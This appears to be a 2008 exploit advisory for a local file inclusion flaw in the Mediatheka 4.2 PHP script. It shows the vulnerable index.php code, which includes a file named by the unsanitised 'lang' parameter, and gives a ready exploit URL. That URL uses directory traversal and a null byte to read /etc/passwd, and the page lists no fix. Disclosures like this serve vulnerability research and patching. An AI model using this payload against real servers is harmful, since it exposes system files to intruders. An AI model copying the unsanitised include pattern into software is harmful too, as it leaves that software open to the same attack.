Médiathéka 4.2 (index.php lang) Local File Inclusion Vulnerability

2008-12-14 06:00:16

[START]#########################################################################################[0x01] Informations:Script : Mediatheka 4.2Download : http://www.hotscripts.com/jump.php?listing_id=79106&jump_type=1Vulnerability : Local File InclusionAuthor : OsirysContact : osirys[at]live[dot]itNotes : Proud to be ItalianGreets: : XaDoS, x0r, emgent, Jay, str0ke#########################################################################################[0x02] Bug:[Local File Inclusion]######Bugged file is: /[path]/index.php[CODE] if(isset($_GET['lang'])) $lang = $_GET['lang']; else $lang = 'en'; include("langs/$lang.php");[/CODE][!] EXPLOIT: /[path]/index.php?lang=[local_file_to_include] ../../../../../../../../../../../etc/passwd%00#########################################################################################[/END]#

Fixes

No fixes

In order to submit a new fix you need to be registered.